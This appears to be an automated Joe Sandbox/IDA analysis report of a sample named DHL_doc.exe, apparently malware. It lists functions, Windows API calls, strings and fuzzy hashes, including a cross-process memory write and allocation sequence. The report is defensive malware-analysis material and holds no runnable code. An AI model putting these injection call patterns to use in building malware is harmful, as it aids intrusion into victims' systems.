Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 9ed71fcac669de88ab6f5e919dd91ca30417d06552778cb33a8ffa1eb058d463
Instruction ID: cf3e37d19c585112f3f7142c622be445877da8869c944a5c752d8b68d2cc9224
Opcode Fuzzy Hash: 9ed71fcac669de88ab6f5e919dd91ca30417d06552778cb33a8ffa1eb058d463
Instruction Fuzzy Hash: 9B01F432245B0C6BD61327756C89D7B2A99ABC17A9B30602DFB25B22E2EF708C016160

Function 00F2000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F1FF41,80070057,?,?,?,00F2035E), ref: 00F2002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F1FF41,80070057,?,?), ref: 00F20046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F1FF41,80070057,?,?), ref: 00F20054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F1FF41,80070057,?), ref: 00F20064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F1FF41,80070057,?,?), ref: 00F20070

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 2c5bf1a05f3ee929c98275600acfb23d8c51605e2037c9550abae91928a98b37
Instruction ID: b8635e41ff70ffba5de7a35a69f6ac8bc0a3b8ff01261c1587a8b57145c11ca3
Opcode Fuzzy Hash: 2c5bf1a05f3ee929c98275600acfb23d8c51605e2037c9550abae91928a98b37
Instruction Fuzzy Hash: 0301A773A00718BFEB108F64EC44BAA7AEDEF44753F144114F906D2221DB71DD40A7A0

Function 00F2E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00F2E997
QueryPerformanceFrequency.KERNEL32(?), ref: 00F2E9A5
Sleep.KERNEL32(00000000), ref: 00F2E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 00F2E9B7
Sleep.KERNEL32 ref: 00F2E9F3

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 36548b15958aeb1ca4462ff604605b769806357713dd541525fb0553c2e058f7
Instruction ID: f08c767c30fd93e856832c4bcbe783060f545e115f04e668f253ce5f69e9e275
Opcode Fuzzy Hash: 36548b15958aeb1ca4462ff604605b769806357713dd541525fb0553c2e058f7
Instruction Fuzzy Hash: 72011731D01A3DDBCF40ABE5EC59AEEBB78FB09711F100556E602B2241CB349594EBA2

Function 00F210F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F21114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00F20B9B,?,?,?), ref: 00F21120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F20B9B,?,?,?), ref: 00F2112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F20B9B,?,?,?), ref: 00F21136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F2114D

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 22ca3b01a9ad4146b76fe66cde8df7751eed6139488cb239ec4fa8db213fb85e
Instruction ID: 85236ed00be721a78a016f94b1d2401a2924e07a12a02f542dc70210f5137f54
Opcode Fuzzy Hash: 22ca3b01a9ad4146b76fe66cde8df7751eed6139488cb239ec4fa8db213fb85e
Instruction Fuzzy Hash: D2016D75500319BFDB114F65EC49A6A3F6EFF89361B110414FA46D3360DA31DC10EAA0

Function 00F20FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F20FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F20FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F20FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F20FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F21002

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: b32a174f25d78a63f074279e65bebe340bf252f1ff4094222247475f06888891
Instruction ID: 0381111a69bd8386799a3a2f3323a50aba83f2f674a53621d9ca072c00433eaf
Opcode Fuzzy Hash: b32a174f25d78a63f074279e65bebe340bf252f1ff4094222247475f06888891
Instruction Fuzzy Hash: B0F04935600319AFDB214FA5AC49F5A3BADFF89762F104414FA4AC6291CA70DC80AAA0

Function 00F21014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F2102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F21036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F21045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F2104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F21062

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: dcda9726a96eb08f6bc9a0f95d72badc831d8661903165ee1d6e03dfbfb5de32
Instruction ID: f2f8b95c0020c87ad265b6909a3017581d1733cd7eb8b0e34ce4f950eff44826
Opcode Fuzzy Hash: dcda9726a96eb08f6bc9a0f95d72badc831d8661903165ee1d6e03dfbfb5de32
Instruction Fuzzy Hash: 9AF06D35200359EFDB215FA5EC49F5A3BADFF89762F100414FA46C7291CA70D880EAA0

Function 00F3030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00F3017D,?,00F332FC,?,00000001,00F02592,?), ref: 00F30324
CloseHandle.KERNEL32(?,?,?,?,00F3017D,?,00F332FC,?,00000001,00F02592,?), ref: 00F30331
CloseHandle.KERNEL32(?,?,?,?,00F3017D,?,00F332FC,?,00000001,00F02592,?), ref: 00F3033E
CloseHandle.KERNEL32(?,?,?,?,00F3017D,?,00F332FC,?,00000001,00F02592,?), ref: 00F3034B
CloseHandle.KERNEL32(?,?,?,?,00F3017D,?,00F332FC,?,00000001,00F02592,?), ref: 00F30358
CloseHandle.KERNEL32(?,?,?,?,00F3017D,?,00F332FC,?,00000001,00F02592,?), ref: 00F30365

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b45d8a4f885e350ed0becda40cbe1574908f38b968e4f9302ab5af4f345d6977
Instruction ID: 8a8ee269a5f9244ef1c88937a3512d5f76f7a23aca92542a202b2c4447511b43
Opcode Fuzzy Hash: b45d8a4f885e350ed0becda40cbe1574908f38b968e4f9302ab5af4f345d6977
Instruction Fuzzy Hash: E6019072800B159FC7309F66D890412F7F9BF502253158A3FD19652931C771A954EE80

Function 00EFD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00EFD752

Part of subcall function 00EF29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00EFD7D1,00000000,00000000,00000000,00000000,?,00EFD7F8,00000000,00000007,00000000,?,00EFDBF5,00000000), ref: 00EF29DE
Part of subcall function 00EF29C8: GetLastError.KERNEL32(00000000,?,00EFD7D1,00000000,00000000,00000000,00000000,?,00EFD7F8,00000000,00000007,00000000,?,00EFDBF5,00000000,00000000), ref: 00EF29F0

_free.LIBCMT ref: 00EFD764
_free.LIBCMT ref: 00EFD776
_free.LIBCMT ref: 00EFD788
_free.LIBCMT ref: 00EFD79A

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2b055749232301c26c3954a9121ae57e8d91853a55a8990dcc545e14cdbad1ec
Instruction ID: 4e1e8f60474106499e5efe42cae7cab1af1c63510dc2e4d02b9daaaf591d7a67
Opcode Fuzzy Hash: 2b055749232301c26c3954a9121ae57e8d91853a55a8990dcc545e14cdbad1ec
Instruction Fuzzy Hash: 27F0EC3258820DAB8621FB64F9C5C7A7BDEBB447147A4280AF258FB551C770FC8096B4

Function 00F25C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00F25C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00F25C6F
MessageBeep.USER32(00000000), ref: 00F25C87
KillTimer.USER32(?,0000040A), ref: 00F25CA3
EndDialog.USER32(?,00000001), ref: 00F25CBD

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 1caae79a1ec1871359e258768ee143f7fc9b8d52e24a367df3a10aea9f26bd2a
Instruction ID: 8f1184ebd9d69cd92c4d3b1001206bba10974adcff8742b6bc40690a7a60b895
Opcode Fuzzy Hash: 1caae79a1ec1871359e258768ee143f7fc9b8d52e24a367df3a10aea9f26bd2a
Instruction Fuzzy Hash: DE018B705407149FEB215B20ED4EF9677B8BB04F06F001559A647614E1E7F06A459A90

Function 00EF22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00EF22BE

Part of subcall function 00EF29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00EFD7D1,00000000,00000000,00000000,00000000,?,00EFD7F8,00000000,00000007,00000000,?,00EFDBF5,00000000), ref: 00EF29DE
Part of subcall function 00EF29C8: GetLastError.KERNEL32(00000000,?,00EFD7D1,00000000,00000000,00000000,00000000,?,00EFD7F8,00000000,00000007,00000000,?,00EFDBF5,00000000,00000000), ref: 00EF29F0

_free.LIBCMT ref: 00EF22D0
_free.LIBCMT ref: 00EF22E3
_free.LIBCMT ref: 00EF22F4
_free.LIBCMT ref: 00EF2305

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b4612e0fc82173c533058836e6c1b98d94147bb174cc1459d73e03f298037c91
Instruction ID: 0d56717ad17fb62ba748f5d24e54b4ed0358f3fe3f47b734619ee42a9b33de4d
Opcode Fuzzy Hash: b4612e0fc82173c533058836e6c1b98d94147bb174cc1459d73e03f298037c91
Instruction Fuzzy Hash: E7F03A7188012E8B8613BF54BC018693BA4FB58764700151FF614E72B1CB700911BBE4

Function 00ED95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00ED95D4
StrokeAndFillPath.GDI32(?,?,00F171F7,00000000,?,?,?), ref: 00ED95F0
SelectObject.GDI32(?,00000000), ref: 00ED9603
DeleteObject.GDI32 ref: 00ED9616
StrokePath.GDI32(?), ref: 00ED9631

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: c56901f6717bbbefe18c02d0f0f0d90278514b06cebb59557496b0ac0c1f9a5a
Instruction ID: 83de13f11370fe9d42ab18c0ad4cb07b86f5c7bcc7391ab25fb7ced7f40218c3
Opcode Fuzzy Hash: c56901f6717bbbefe18c02d0f0f0d90278514b06cebb59557496b0ac0c1f9a5a
Instruction Fuzzy Hash: C8F03C3040570DEFDB125F65ED1C7643B61FB003A6F048226F626A51F1C7318996EF60

Function 00EF0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00EF10F9
__freea.LIBCMT ref: 00EF1117

Part of subcall function 00EF1537: _free.LIBCMT ref: 00EF154F

Strings

am/pm, xrefs: 00EF117A
a/p, xrefs: 00EF11DE

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: bf6330cdc1091d4913a08e511ffc7168e2fa5c3c95fb04c10419c08741e041d1
Instruction ID: 2129fc8b64ba7ef4d8257132075eed2499d406396339f0ef55fcf66d7b4f0616
Opcode Fuzzy Hash: bf6330cdc1091d4913a08e511ffc7168e2fa5c3c95fb04c10419c08741e041d1
Instruction Fuzzy Hash: 69D12331A0124ECADB288F68C845BFEB7B1FF05304F692199EB05BB650E7359D80DB91

Function 00F47B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00EE0242: EnterCriticalSection.KERNEL32(00F9070C,00F91884,?,?,00ED198B,00F92518,?,?,?,00EC12F9,00000000), ref: 00EE024D
Part of subcall function 00EE0242: LeaveCriticalSection.KERNEL32(00F9070C,?,00ED198B,00F92518,?,?,?,00EC12F9,00000000), ref: 00EE028A

Part of subcall function 00EC9CB3: _wcslen.LIBCMT ref: 00EC9CBD

Part of subcall function 00EE00A3: __onexit.LIBCMT ref: 00EE00A9

__Init_thread_footer.LIBCMT ref: 00F47BFB

Part of subcall function 00EE01F8: EnterCriticalSection.KERNEL32(00F9070C,?,?,00ED8747,00F92514), ref: 00EE0202
Part of subcall function 00EE01F8: LeaveCriticalSection.KERNEL32(00F9070C,?,00ED8747,00F92514), ref: 00EE0235

Strings

Variable must be of type 'Object'., xrefs: 00F47C3A
G, xrefs: 00F47C7F
5, xrefs: 00F47C78

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: ab421dc4e1a8d0a02a54167078b5c5722c407a8ffadb008e04724088bc0de5d7
Instruction ID: dd60609bd65563d8fd9d07c7a1ba675708d1c5dd4aa0f3b7b2afedb02914f1a5
Opcode Fuzzy Hash: ab421dc4e1a8d0a02a54167078b5c5722c407a8ffadb008e04724088bc0de5d7
Instruction Fuzzy Hash: 93919B71A04309EFCB14EF94D881DADBBB1EF48314F148059FC06AB292DB71AE45EB51

Function 00EF5AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

JO, xrefs: 00EF5BA8, 00EF5C6C

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID: JO
API String ID: 0-1663374661
Opcode ID: 63bd3081c8b6d5bff010ebb9413bff70b1541631f39aa7796268e2d25fde68ad
Instruction ID: edd6a6f91252f8d0b15ff1722c75f71257c72fdd0077049d9472e3c716fecd4f
Opcode Fuzzy Hash: 63bd3081c8b6d5bff010ebb9413bff70b1541631f39aa7796268e2d25fde68ad
Instruction Fuzzy Hash: BB51CF72900A0D9FCB119FA5C845EFEBBB8AF69314F14205AF706B7291D7319A019B61

Function 00EF8A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00EF8B6E
GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00EF8B7A
__dosmaperr.LIBCMT ref: 00EF8B81

Strings

., xrefs: 00EF8A63

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr
String ID: .
API String ID: 2434981716-3963672497
Opcode ID: 69d59bbf0a606db808e39fe7161636064e1f316655209e842f928327be298f41
Instruction ID: 4d8162c6b79dd543be4954b2769adbca358bc0679d825af34ce3dc1e4dde3c2c
Opcode Fuzzy Hash: 69d59bbf0a606db808e39fe7161636064e1f316655209e842f928327be298f41
Instruction Fuzzy Hash: 2241027560414DAFCB259F24DD81ABD7FE5DF85308F28A1AAFA84A7242DE31CD02D790

Function 00F22716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F221D0,?,?,00000034,00000800,?,00000034), ref: 00F2B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F22760

Part of subcall function 00F2B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F221FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00F2B3F8

Part of subcall function 00F2B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00F2B355
Part of subcall function 00F2B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F22194,00000034,?,?,00001004,00000000,00000000), ref: 00F2B365
Part of subcall function 00F2B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F22194,00000034,?,?,00001004,00000000,00000000), ref: 00F2B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F227CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F2281A

Strings

@, xrefs: 00F22832

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 2bf734e5cffa4cb1091aa172d47564aa012f1ae86e35b6f19d0412dde620f5fb
Instruction ID: 3a7711afa447ab0d4aefa9d4feb7683cbb85499781361e13a8bff191e98cdff0
Opcode Fuzzy Hash: 2bf734e5cffa4cb1091aa172d47564aa012f1ae86e35b6f19d0412dde620f5fb
Instruction Fuzzy Hash: 28413D72900228BFDB10DFA4DD85ADEBBB8EF09310F004095FA55B7181DB706E45DBA0

Function 00EF172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL_doc.exe,00000104), ref: 00EF1769
_free.LIBCMT ref: 00EF1834
_free.LIBCMT ref: 00EF183E

Strings

C:\Users\user\Desktop\DHL_doc.exe, xrefs: 00EF1760, 00EF1767, 00EF1796, 00EF17CE

Memory Dump Source

